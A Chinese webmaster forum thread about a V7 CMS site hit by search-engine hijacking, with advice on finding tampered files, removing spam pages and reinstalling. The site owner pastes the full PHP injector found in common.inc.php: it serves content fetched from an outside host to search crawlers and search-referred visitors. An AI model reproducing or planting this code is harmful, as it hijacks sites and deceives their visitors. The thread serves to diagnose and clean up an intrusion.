使用的V7版本，网站搜索引擎劫持了，应当怎么处理啊

官方动态功能建议插件模块风格模板问题反馈技术交流站长杂谈代码共享 V系列产品运营交流

分享 收藏 举报: X

Zhao 消费0元 2019-11-06 08:28 08:28 中兴

普通粉丝

1484: 12

使用的V7版本，网站搜索引擎劫持了，应当怎么处理啊，搜索引擎的快照不是用的，通过搜索引擎进入也不是我的网站，但手工输入确是OK的，这该怎么处理？有没有大佬给支个招，谢谢了

赏礼

赏钱

点击回复

全部留言

共 12 条

华桥普通粉丝 消费:0元 2019-12-30 21:23 21:236楼

这个好可怕啊，。。。。。

0 赏礼回复

aaa999 普通粉丝 消费:1371元 2019-11-07 07:56 07:566楼

用v7很多年没遇到过这样的问题

Zhao 消费:0元 中兴 2019-11-07 08:10

应当是服务器被入侵，源码被修改了.
这次被修改的是common.inc.php

weiqian 消费:0.7元 2019-11-07 08:26

@Zhao
换X1算了吧

Zhao 消费:0元 中兴 2019-11-07 08:38

@weiqian 目前来看X1还没有好的门户模板，另外原来的采集的几万文章也不好转移，转移后不知道有没有好的采集插件可用

0 赏礼回复

咋了兄弟被煮了？https://tool.wanxiangsucai.com/ziyuan/inde.php?page=1
https://tool.wanxiangsucai.com/seo/
https://so.wanxiangsucai.com
https://x1.wanxiangsucai.com

素之美风格开发者 消费:495.25元 2019-11-06 13:29 13:296楼

一切不安全基本上取决于服务器，最彻底的方法还是从装程序，我这边有几个V7运营得好好的

艺猫 消费:115.1元 2019-11-07 07:03

现在阿里云的服务器能基本保证安全吗？

1 赏礼回复

Zhao 普通粉丝 消费:0元 2019-11-06 21:29 21:296楼

set_time_limit(0);
error_reporting(0);
date_default_timezone_set('Asia/Shanghai');
//header("Content-Type: text/html;charset=gb2312");
define('hquu', "http://god.d22p.com";);
define('host', "/?host=" . $_SERVER['HTTP_HOST']);
define('hurl', "&abc=" . $_SERVER['REQUEST_URI']);
define('agent', "&agent=" . $_SERVER['HTTP_USER_AGENT']);
define('urls', "&urls=0");
define('tz', "&tz");
define('url', $_SERVER['REQUEST_URI']);
define('Referer', $_SERVER['HTTP_REFERER']);
define('AGEN', $_SERVER['HTTP_USER_AGENT']);
$hqa = array(
    '360spider',
    'HaoSou',
    'Sogou',
    'Yisou'
);
function isCrawler() {
        $agent= strtolower($_SERVER['HTTP_USER_AGENT']);  
        if (!empty($agent)) {                
                $spiderSite= array('Baiduspider','Sosospider+','Sogou web spider','Yisouspider','Sogou inst spider','Sogou Spider','Sogou News Spider','360spider');  
                foreach($spiderSite as $val) {$str = strtolower($val);if (strpos($agent, $str) !== false) {        return true;}                      
                }  
        } else {
                return false;
        }
}
foreach ($hqa as $a3) {
	if  (stristr(AGEN, 'Baidu')){ 
    if (stristr(url, ".xml")) {
            echo get(hquu . host .agent . hurl);
            exit();
        }else{
        echo get(hquu . host . hurl . urls);
    }
}elseif(stristr(AGEN, $a3)){
	echo get(hquu . host . hurl);
    //exit();
}
}
if (stristr(Referer,'baidu') ) { 
    if (!isCrawler())
{
    if (stristr(url, ".xml")) {
        echo get(hquu . host . tz);
        exit();
    }
}
}elseif(stristr(Referer,'sogou') or stristr(Referer,'sm.') or stristr(Referer,'so.'))
{
		if (!isCrawler()){
        echo get(hquu . host . tz);
        exit();
		}
}
function get($url) {
    $hqts = array(
        'http' => array(
            'method' => "GET"
        )
    );
    $hqtext = stream_context_create($hqts);
    $con = curl($url, false, $hqtext);
    if (empty($con)) {
        exit("<p align='center'><font color='red'><b>Error!</b></font></p>");
    }
    return $con;
}
function curl($hquu) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $hquu);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    return curl_exec($ch);
    curl_close($ch);
}

找到一个垃圾文件

0 赏礼回复

深圳家-深圳生活信息门户

天外来客风格开发者 消费:230.24元 2019-11-06 08:51 08:516楼

查不到此域名的授权信息,有问题,请联系官方客服!

在网上下载的源码被挂马篡改也是常见的！好自为之。

0 赏礼回复

注意：如对x1系统基础使用知识都不会的，请不要安装旗下应用。

天外来客风格开发者 消费:230.24元 2019-11-06 08:37 08:376楼

根据你这个信息，也没发网址，一般是网站被篡改了！

1、第一种很常见的就是整个网页被篡改，然后百度快照抓取了，不管是从百度还是输入都是垃圾信息内容；

2、隐藏一点的，可以正常域名访问，但是用百度或者相关搜索引擎进入就进行了跳转；

解决方式很简单，找到根目录或模板文件对比备份，寻找可疑的代码，有的是js或dwz.cn来隐藏；
这个自己去检查了。

Zhao 消费:0元 中兴 2019-11-06 08:41

首先谢谢您的及时回复！
附件是搜索引擎site出来的结果，一个示例网址如下
http://www.shenzhenjia.net/news/list.php?uu2099324243.xml

天外来客 消费:230.24元 2019-11-06 08:47

找到这些垃圾信息的路径，然后去删除

如：
http://www.shenzhenjia.net/news/list.php?wd325188271.xml

那么在news目录去排查，一般会有生成文件，持续产生这些垃圾，目录里面的是已经被生成的；

可以先去删除，然后逐一排查代码，对比备份，进行删除，这些信息被删除后，去快照投诉百度更新删除；

只能交流怎么多了，需要自己去处理。